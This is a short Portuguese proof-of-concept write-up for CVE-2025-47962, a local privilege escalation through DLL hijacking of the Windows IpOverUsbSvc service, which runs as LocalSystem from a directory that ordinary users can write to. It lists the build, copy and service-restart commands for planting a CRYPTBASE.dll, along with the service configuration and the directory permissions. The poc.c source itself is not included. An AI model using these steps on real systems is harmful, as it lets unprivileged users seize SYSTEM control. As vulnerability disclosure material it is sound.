
Prova de conceito para CVE-2025-47962 demonstrando escalada de privilégio local via sequestro de DLL no serviço Windows IpOverUsbSvc devido a permissões de diretório inseguras.
Processo de reprodução: i686-w64-mingw32-gcc -shared -o CRYPTBASE.dll poc.c -lkernel32
copy CRYPTBASE.dll "C:\Microsoft Shared\Phone Tools\CoreCon\11.0\bin\CRYPTBASE.dll"
net stop IpOverUsbSvc
net start IpOverUsbSvc

Explicação: IpOverUsbSvc
sc.exe qc IpOverUsbSvc
SERVICE_NAME: IpOverUsbSvc
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
BINARY_PATH_NAME : "C:\Microsoft Shared\Phone Tools\CoreCon\11.0\bin\IpOverUsbSvc.exe"
SERVICE_START_NAME : LocalSystem
Executa com privilégios de LocalSystem. O executável está localizado no diretório C:\Microsoft Shared, sobre o qual os utilizadores padrão possuem permissões de controlo total.
Foi descoberto que utilizadores comuns podem escrever ficheiros no diretório de serviço SYSTEM.
Em seguida, monitorize a DLL

As permissões para o diretório C:\Microsoft Shared\ criado durante a instalação do Windows SDK estão configuradas incorretamente:
C:\Microsoft Shared BUILTIN\Users:(I)(OI)(CI)(F)
NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(M)